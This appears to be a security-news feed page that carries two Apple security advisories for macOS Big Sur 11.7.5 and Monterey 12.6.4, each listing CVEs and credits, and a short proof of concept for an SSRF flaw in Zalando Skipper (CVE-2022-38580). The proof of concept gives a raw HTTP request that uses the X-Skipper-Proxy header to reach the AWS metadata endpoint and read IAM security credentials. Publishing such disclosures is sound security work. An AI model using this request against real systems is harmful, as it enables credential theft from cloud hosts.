NetworkExtension  
Available for: macOS Big Sur  
Impact: A user in a privileged network position may be able to spoof  
a VPN server that is configured with EAP-only authentication on a  
device  
Description: The issue was addressed with improved authentication.  
CVE-2023-28182: Zhuowei Zhang

PackageKit  
Available for: macOS Big Sur  
Impact: An app may be able to modify protected parts of the file  
system  
Description: A logic issue was addressed with improved checks.  
CVE-2023-27962: Mickey Jin (@patch1t)

System Settings  
Available for: macOS Big Sur  
Impact: An app may be able to access user-sensitive data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-23542: an anonymous researcher

System Settings  
Available for: macOS Big Sur  
Impact: An app may be able to read sensitive location information  
Description: A permissions issue was addressed with improved  
validation.  
CVE-2023-28192: Guilherme Rambo of Best Buddy Apps (rambo.codes)

Vim  
Available for: macOS Big Sur  
Impact: Multiple issues in Vim  
Description: Multiple issues were addressed by updating to Vim  
version 9.0.1191.  
CVE-2023-0433  
CVE-2023-0512

XPC  
Available for: macOS Big Sur  
Impact: An app may be able to break out of its sandbox  
Description: This issue was addressed with a new entitlement.  
CVE-2023-27944: Mickey Jin (@patch1t)

Additional recognition

Activation Lock  
We would like to acknowledge Christian Mina for their assistance.

AppleMobileFileIntegrity  
We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing  
(wojciechregula.blog) for their assistance.

CoreServices  
We would like to acknowledge Mickey Jin (@patch1t) for their  
assistance.

NSOpenPanel  
We would like to acknowledge Alexandre Colucci (@timacfr) for their  
assistance.

Wi-Fi  
We would like to acknowledge an anonymous researcher for their  
assistance.

macOS Big Sur 11.7.5 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmQiHnwACgkQ4RjMIDke  
Nxks0hAAquqDdtX6QvjVigRuSd2bpQny1TxVp62Zo47F9YkrvuvKVvJjaFzQJNjE  
p2Oq3BgNBkUqei26w8GLqwbg8szhCIPCOVHFcGDTPGrf53oWLlPc6WZxn8ihZOo4  
r3rxH4MGFSb+dBwWnF6GVX1EBcVjO08FwOzgNqkh2baqSU0iuxnSRW9XYmzwhG1w  
bj86kfnCooSLJlUTiTbXxN8W/vmfwRWONXQTkkOa47knWSKH9QBzzfAJKbil6sRE  
hDiYdtXUER//PApErvjl5i6b5wRQ0KQ19X//XfZzJtWCPuh0/nw7ducHJg+DpPUc  
EfNINhPKauqUvw516EvDuW0yVIlyMrfNCJOpHwQkmCfqx2i6l1+U5M8yqsyVcpbe  
Nbs6LYMNvDalLnazRRA3oT3036MrnCWem/M1afTrsoHYnhYb8FMx9gI3GV2Swgud  
fJrPttdjtpwlrCF60KsquJEvmcrNFwKk+QKS8Gbe8bbJSPk1AGsHN1JivFNiC036  
fycIK1ffwPHPYJgF6rLCOQ9q+DHRTw+lR0UrGmRplrjVBwt9cdiuLaeJZWPyGMwP  
P5QYlkULAE+5B4HKqzKMFYPkoEMzmvdOsgbhcg7OSmP1PAiAW6m7HnOmDAX7E2El  
03qFLcjb1GxM/U+lKN5Xx4rH+BR0yrEx20oZGX9Vymn7UJVYlDI=  
=xOHM  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-03-27-5

X-Skipper-Proxy version 0.13.237 suffers from a server-side request forgery vulnerability.

    #Exploit Title: X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)#Date: 24/10/2022#Exploit Author: Hosein Vita & Milad Fadavvi#Vendor Homepage: https://github.com/zalando/skipper#Software Link: https://github.com/zalando/skipper#Version: < v0.13.237#Tested on: Linux#CVE: CVE-2022-38580Summary:Skipper prior to version v0.13.236 is vulnerable to server-side request forgery (SSRF). An attacker can exploit a vulnerable version of proxy to access the internal metadata server or other unauthenticated URLs by adding an specific header (X-Skipper-Proxy) to the http request.Proof Of Concept:1- Add header "X-Skipper-Proxy"  to your request2- Add the aws metadata to the pathGET /latest/meta-data/iam/security-credentials HTTP/1.1Host: yourskipperdomain.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36X-Skipper-Proxy: http://169.254.169.254Connection: closeReference:https://github.com/zalando/skipper/security/advisories/GHSA-f2rj-m42r-6jm2

X-Skipper-Proxy 0.13.237 Server-Side Request Forgery

Apple Security Advisory 2023-03-27-4 - macOS Monterey 12.6.4 addresses bypass, code execution, integer overflow, out of bounds read, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-03-27-4 macOS Monterey 12.6.4

macOS Monterey 12.6.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213677.

Apple Neural Engine  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23540: Mohamed GHANNAM (@_simo36)

AppleMobileFileIntegrity  
Available for: macOS Monterey  
Impact: A user may gain access to protected parts of the file system  
Description: The issue was addressed with improved checks.  
CVE-2023-23527: Mickey Jin (@patch1t)

Archive Utility  
Available for: macOS Monterey  
Impact: An archive may be able to bypass Gatekeeper  
Description: The issue was addressed with improved checks.  
CVE-2023-27951: Brandon Dalton of Red Canary and Csaba Fitzl  
(@theevilbit) of Offensive Security

Calendar  
Available for: macOS Monterey  
Impact: Importing a maliciously crafted calendar invitation may  
exfiltrate user information  
Description: Multiple validation issues were addressed with improved  
input sanitization.  
CVE-2023-27961: Rıza Sabuncu (@rizasabuncu)

ColorSync  
Available for: macOS Monterey  
Impact: An app may be able to read arbitrary files  
Description: The issue was addressed with improved checks.  
CVE-2023-27955: JeongOhKyea

CommCenter  
Available for: macOS Monterey  
Impact: An app may be able to cause unexpected system termination or  
write kernel memory  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2023-27936: Tingting Yin of Tsinghua University

dcerpc  
Available for: macOS Monterey  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: The issue was addressed with improved bounds checks.  
CVE-2023-27935: Aleksandar Nikolic of Cisco Talos

dcerpc  
Available for: macOS Monterey  
Impact: A remote user may be able to cause unexpected system  
termination or corrupt kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-27953: Aleksandar Nikolic of Cisco Talos  
CVE-2023-27958: Aleksandar Nikolic of Cisco Talos

Foundation  
Available for: macOS Monterey  
Impact: Parsing a maliciously crafted plist may lead to an unexpected  
app termination or arbitrary code execution  
Description: An integer overflow was addressed with improved input  
validation.  
CVE-2023-27937: an anonymous researcher

ImageIO  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted file may lead to unexpected  
app termination or arbitrary code execution  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
CVE-2023-27946: Mickey Jin (@patch1t)

Kernel  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2023-23514: Xinru Chi of Pangu Lab and Ned Williamson of Google  
Project Zero

Kernel  
Available for: macOS Monterey  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-27933: sqrtpwn

Kernel  
Available for: macOS Monterey  
Impact: An app may be able to disclose kernel memory  
Description: A validation issue was addressed with improved input  
sanitization.  
CVE-2023-28200: Arsenii Kostromin (0x3c3e)

Model I/O  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted file may lead to unexpected  
app termination or arbitrary code execution  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2023-27949: Mickey Jin (@patch1t)

NetworkExtension  
Available for: macOS Monterey  
Impact: A user in a privileged network position may be able to spoof  
a VPN server that is configured with EAP-only authentication on a  
device  
Description: The issue was addressed with improved authentication.  
CVE-2023-28182: Zhuowei Zhang

PackageKit  
Available for: macOS Monterey  
Impact: An app may be able to modify protected parts of the file  
system  
Description: A logic issue was addressed with improved checks.  
CVE-2023-23538: Mickey Jin (@patch1t)  
CVE-2023-27962: Mickey Jin (@patch1t)

Podcasts  
Available for: macOS Monterey  
Impact: An app may be able to access user-sensitive data  
Description: The issue was addressed with improved checks.  
CVE-2023-27942: Mickey Jin (@patch1t)

Sandbox  
Available for: macOS Monterey  
Impact: An app may be able to modify protected parts of the file  
system  
Description: A logic issue was addressed with improved checks.  
CVE-2023-23533: Mickey Jin (@patch1t), Koh M. Nakagawa of FFRI  
Security, Inc., and Csaba Fitzl (@theevilbit) of Offensive Security

Sandbox  
Available for: macOS Monterey  
Impact: An app may be able to bypass Privacy preferences  
Description: A logic issue was addressed with improved validation.  
CVE-2023-28178: Yiğit Can YILMAZ (@yilmazcanyigit)

Shortcuts  
Available for: macOS Monterey  
Impact: A shortcut may be able to use sensitive data with certain  
actions without prompting the user  
Description: The issue was addressed with additional permissions  
checks.  
CVE-2023-27963: Jubaer Alnazi Jabin of TRS Group Of Companies and  
Wenchao Li and Xiaolong Bai of Alibaba Group

System Settings  
Available for: macOS Monterey  
Impact: An app may be able to access user-sensitive data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-23542: an anonymous researcher

System Settings  
Available for: macOS Monterey  
Impact: An app may be able to read sensitive location information  
Description: A permissions issue was addressed with improved  
validation.  
CVE-2023-28192: Guilherme Rambo of Best Buddy Apps (rambo.codes)

Vim  
Available for: macOS Monterey  
Impact: Multiple issues in Vim  
Description: Multiple issues were addressed by updating to Vim  
version 9.0.1191.  
CVE-2023-0433  
CVE-2023-0512

XPC  
Available for: macOS Monterey  
Impact: An app may be able to break out of its sandbox  
Description: This issue was addressed with a new entitlement.  
CVE-2023-27944: Mickey Jin (@patch1t)

Additional recognition

Activation Lock  
We would like to acknowledge Christian Mina for their assistance.

AppleMobileFileIntegrity  
We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing  
(wojciechregula.blog) for their assistance.

CoreServices  
We would like to acknowledge Mickey Jin (@patch1t) for their  
assistance.

NSOpenPanel  
We would like to acknowledge Alexandre Colucci (@timacfr) for their  
assistance.

Wi-Fi  
We would like to acknowledge an anonymous researcher for their  
assistance.

macOS Monterey 12.6.4 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmQiHnwACgkQ4RjMIDke  
Nxn7kg/9FdItHdT/4pNdkvgRRdAppZbLHwvTICqQL5NW9r2at6bsEVI4euNmz6Nc  
tZev1qAgiHKohwtblwLmt5x7T6j4GJ/JlR/6owBhu2K3Zd+dMfFyz3Azgb9o/3JM  
SDLhOGilCQxrg/MBMvT1GVOhDbGZpj8CdVj5zux0cEOW070fsVAeU8U8eUsa9Oer  
Ihoys5FSfQ9Wvl8jtTuAQE2kuoh/vwnThpT1XEp95fW4u98GkTyoZDk01/aVuNDN  
nuqnJVAi12V3pWeT19wWk2osILE7cdLFWi3d5qK7YHUhy/YsVRMwwPUVPPSYq3bF  
RIZmBCHNO1TJniM/0Ji6FyPwQpt0v0kabxZnYLy/0pilRsMlJNPhcTm6CTCCKp/M  
YBhiJMIZcxr6qjzb4yq+VO1bSS0bjFZYJBM71fb0MBdnl2ogLYRh8c+WvDA/Avmq  
fjXxpAH/wXkO1J+ccJl+5ESIP6eEc+jm8ra5oiZETDRO3UhPtcHWPSJcKKzIyv9U  
ZP+4jYDmDeNAzpS6b/sI+1DD86ozxv2WdFGo1k7P0o8AFb4XnY4GoZYy7cOAm5EA  
FUyJokGkgByuvu9XhbEzSM/K24dQziWTj2eNMXXl/FV5/1A629ZcCAXKwzO+0dYF  
tthhKi6q7oFAIBB5FiapaJNQsazipx+XGFKQUNDZAmuG4GsIiFg=  
=GR5+  
-----END PGP SIGNATURE-----

Tag

#apple